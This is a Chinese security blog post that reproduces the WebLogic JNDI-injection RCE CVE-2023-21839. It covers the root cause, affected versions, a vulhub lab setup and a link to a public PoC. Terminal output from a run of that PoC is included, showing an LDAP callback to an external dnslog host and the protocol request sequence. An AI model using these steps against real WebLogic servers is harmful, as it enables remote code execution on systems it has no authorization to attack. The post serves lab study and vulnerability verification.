免责声明
本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。
漏洞简述
CVE-2023-21839是一个weblogic的JNDI注入漏洞。由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端,并且可以通过lookup查看,当远程对象继承自OpaqueReference时,lookup查看远程对象,服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法,并且存在retVal = context.lookup(this.remoteJNDIName)实现,故可以通过rmi/ldap远程协议进行远程命令执行。
漏洞影响
weblogic_server = 12.2.1.3.0
weblogic_server = 12.2.1.4.0
weblogic_server = 14.1.1.1.0
环境搭建
受害机: weblogic IP:192.168.8.113
攻击机 kali IP: 192.168.8.105
Dnslog: http://dnslog.cn
这里使用vulhub 进行测试环境搭建,命令如下:
环境链接:https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/
cd CVE-2023-21839/
docker-compose up -d
漏洞复现
POC 链接:https://github.com/4ra1n/CVE-2023-21839
本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。
我们这里使用kali 进行编译
┌──(root㉿kali)-[~/poc_exp/CVE-2023-21839/cmd]
└─
[192.168.8.113 ] your-ip:
[7001 ] your-port:
[//e5nkrq.dnslog.cn/evil ] your-ldap: ldap:
[12 ] weblogic
[2 LocateRequest ] id=
[3 RebindRequest ] id=
[4 RebindRequest ] id=
[5 LocateRequest ] id=
[6 ResolveRequest ] id=
[7 ResolveRequest ] id=
使用集成工具检测
参考链接:https://xz.aliyun.com/t/12297
获取工具
原文始发于微信公众号(贝雷帽SEC):【漏洞复现】WebLogic RCE CVE-2023-21839(POC)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论